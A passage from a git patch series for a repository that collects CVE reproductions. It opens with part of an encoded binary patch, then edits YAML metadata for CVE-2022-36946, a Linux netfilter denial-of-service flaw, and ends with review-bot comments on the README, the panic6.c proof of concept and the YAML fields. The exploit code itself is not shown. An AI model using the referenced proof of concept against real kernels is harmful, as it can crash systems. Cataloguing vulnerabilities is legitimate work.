z;O=TCX0Pndy*tL{OS9aMp_7U0*n+f$?vmRNjIPx|2cAFXBTM1!dhS_`7yM2T>arbI z8V^J|9Hkf+jOTB*kuaGu$IV9#YE|sH^&iiUk_JXJYA*c}x8=VFbQ;WV9s~jam$m@_ zs{b;eVWf}%Un4!=Kj-s~+qqDl5#$T+v#hv+PPt3QG?0=|E?^9^w0^$1ajT9il8_B6 zx$F=iou@gzG9IO|uj6I862e7{JR7|z9M29_Tq`qUEM=EV1|W{!pL*%M`k1DQq)!@W zsj}>zu)8oP_AUSof+lkJin8>!p9TQK>#V)2hiLcaKRJ(SAC|_KR(p4oN zuhHW*j;0VlwSm`j9Z22@ufRzt>z>_Iuh8t>cIMqrlinY#&qn&t?8A+eQ{r z(bh8UtwoN&%bdXzxYnszswJ@`=X+ zO)ka^0O#+-N*CV<4}4}+dbkE6?GR1SK|i=Sfg+i7aGY=Yw%r*S*8ZUOT*%kK`%cdv z_$BRpMK~oFI50*lA}f`g4zra{yD(j~gXL}hNO8@QMSd!3b0RtBL$0;{Gw90056(el zgJz$@qLVxP1)uW^YoROpR*z5^xzk(}(T3I}vvt3YwL2o~a4wB<9Fl9*6_N`>MB;Xe z^SRiw&j=pU-P<|41!J~px)QXPn+vnY6YJFXNyREOW*CRZMIqwLgpg}dHgQkhk*B1d zxAMZfY0U7n+d8<%cs0*F>X6-uJ;bKeo_G5KgXmXdJMY{*rv`7_u#D*|yH9L7j-_TR zHPs{qQM8knI5Wu5$sGTL#-=wwGJ^LCthBOXyw*wNnQ@b%KK{e>$SaP9OK}vI(3Y 
zi7=t^G-H2mjv0h%e`Fnc1L-xE3M|l!nD0+HNa12za%Fa>Ia|MC(tQsB_7^@& z$?J+xPx`U?HHjgXKbm-C=H&afLxPyPDaLdpd^q0&yUxs6`B;$_P3j7)rO4IosD9I8 zE*POZ_`Ufl)wMns-9CGb%}-qkCF8(xDCe4fd?lgqUdYyw6OleaCYy7srB&OxCXA*p z#(N~O4-E!PwVjR?H`3a#BpRryTUC=+u1x2}*EtOdM#e8yh~de#Ri04>XsRH$QZO zxTYXXWd4B(JgCsr6C8F}nLn~)IKnxH+RA;0*z;P6z%Ey#swe;jjDB|2Tlc%NVSb0M zI7v>38O5BNgy5>;6mBd#J$ELxs=nZFN=$ljo!)n#hhikA1oDWE!Z%iUFI{zcHAnLz z^Ph9fVmx`F9VXMwykZMpSc>U*M9cLz0Ccs!zR=Xr-Fb9*&W)>tpDF@}*pzn?=>++R z>DEq>tIcQNdvP*l0rV-j_k-mHX0K4BM_M>}XJ&BAh<1wj9LJ#nCL(?7;AR>1xF@vw ziwMDfiwFSl@7nXb0YUx{q5mU6|3Uq;27O~}`3-dNYyBtG-=*lU_I_vn@8QOL$p8QS8ech9RL6T -- Gitee From fa446c9f2dc1076dcf731f81fa306ea6180da846 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:18:04 +0000 Subject: [PATCH 11/14] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-36946/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-36946/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-36946/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-36946/.keep b/cve/linux-kernel/2022/CVE-2022-36946/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From da108905a6257c7f583eef34c25b0887faaca243 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:19:37 +0000 Subject: [PATCH 12/14] add CVE-2022-36946. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index 50c36934..fc9b69fc 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml 
@@ -16,5 +16,4 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2022-36946 - cwe-id: CWE-190 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + tags: 拒绝服务,cve2022 \ No newline at end of file -- Gitee From 46a5bfd3b8f859bceac399fb83fd63e9ef6a3ddf Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:27:14 +0000 Subject: [PATCH 13/14] update cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index fc9b69fc..87de732f 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml @@ -5,7 +5,7 @@ info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: 高危 description: | - Linux 内核中 net/netfilter/nfnetlink_queue.c 到 5.18.14 中的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 scope-of-influence: 5.18.14 reference: -- Gitee From d901c4bfc13f87dcd91c34010e012943ef57c4e0 Mon Sep 17 00:00:00 2001 From: liuxiaoxinxinxin Date: Fri, 10 Mar 2023 07:36:12 +0000 Subject: [PATCH 14/14] update cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml. Signed-off-by: liuxiaoxinxinxin --- cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml index 87de732f..eb773fd6 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml 
@@ -1,5 +1,4 @@ -id: -CVE-2022-36946 +id: CVE-2022-36946 source: https://github.com/Pwnzer0tt1/CVE-2022-36946 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 -- Gitee
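Review bot: The CVE-2022-36946-main.zip added in PATCH 02/14 is an opaque binary blob that cannot be reviewed in a diff, and although PATCH 10/14 deletes it again it stays in the repository history; drop both commits from the series and keep only the extracted README.md and panic6.c that PATCH 09/14 ends up with, so every byte that lands in the tree is readable in review.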
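Review bot: README.md as added in PATCH 09/14 (byte-identical to the copy added in 03/14 and deleted in 07/14) links the PoC as `[this](/panic6.c)`, a root-relative path that does not resolve from cve/linux-kernel/2022/CVE-2022-36946/; use `panic6.c` instead. The same file has typos in the introduction ("behavour", "than", "anlayzed", "dicovery"), an untagged ``` fence that should be ```c, and no attribution or licence for the upstream repository it was copied from (https://github.com/Pwnzer0tt1/CVE-2022-36946, recorded only in the yaml `source:` field), which the README itself should state when third-party text and code are redistributed.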
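Review bot: In panic6.c (PATCH 09/14, same content as 06/14), `socket_conn()` is declared `int` but falls off the end without a `return`, and `connfd` and `cli` are declared but never used; declare the function `void` (or `return sockfd;`) and drop the two dead declarations so the file builds cleanly under -Wall. Separately, every `#include` line in the hunk is rendered without a header name; confirm the committed file still carries the headers the compile command in the comment depends on, otherwise the file does not compile as committed.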
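Review bot: The yaml file in PATCH 04/14 is created at `cve/linux-kernel/2022/yaml/ CVE-2022-36946` with a leading space in the file name, and the rename in PATCH 05/14 keeps that space (`yaml/ CVE-2022-36946.yaml`); rename it to `yaml/CVE-2022-36946.yaml` so tooling that globs or indexes the yaml directory finds it. In the same hunk `id:` is split over two lines (`+id:` / `+CVE-2022-36946`), which parses as a null id in YAML (only fixed in PATCH 14/14), the original tags `权限提升,容器逃逸` (privilege escalation, container escape) contradict the C:N/I:N/A:H vector on the line above them (corrected to `拒绝服务` only in PATCH 12/14), and the file has no trailing newline. The `cvss-metrics` line also claims AV:N/PR:N while the README in this series lists the local CAP_NET_ADMIN capability as a requirement; either reconcile the two or state that the vector is reproduced as published by the referenced NVD entry.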
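Review bot: Dropping `- cwe-id: CWE-190` in PATCH 12/14 leaves the classification block with no weakness id at all; if CWE-190 was wrong, replace it with the correct id and cite where it comes from rather than removing the field, otherwise consumers of this yaml lose the CWE entirely. The tag change to `拒绝服务,cve2022` is right given the C:N/I:N/A:H vector.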
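Review bot: The reworded description in PATCH 13/14 (`Linux5.18.14 内核中 ...`) narrows the affected range to exactly one kernel version, whereas the line it replaces (`... 到 5.18.14 中的nfqnl_mangle ...`, i.e. through 5.18.14) and the README's "Fixed in linux kernel 5.19" describe all kernels up to and including 5.18.14; keep the "through 5.18.14" wording, and if `scope-of-influence` is meant as an upper bound write it as one (for example `<= 5.18.14`) rather than the bare `5.18.14`.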
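Review bot: The `id:` fix in PATCH 14/14 is correct, but it, PATCH 12/14 and PATCH 13/14 are all repairs to the yaml introduced in 04/14, and PATCHes 07/14 through 11/14 only delete and re-add files from 01/14 to 06/14; squash the series into one commit per final artifact (README.md, panic6.c, the yaml) so the history records the reviewed end state rather than the churn.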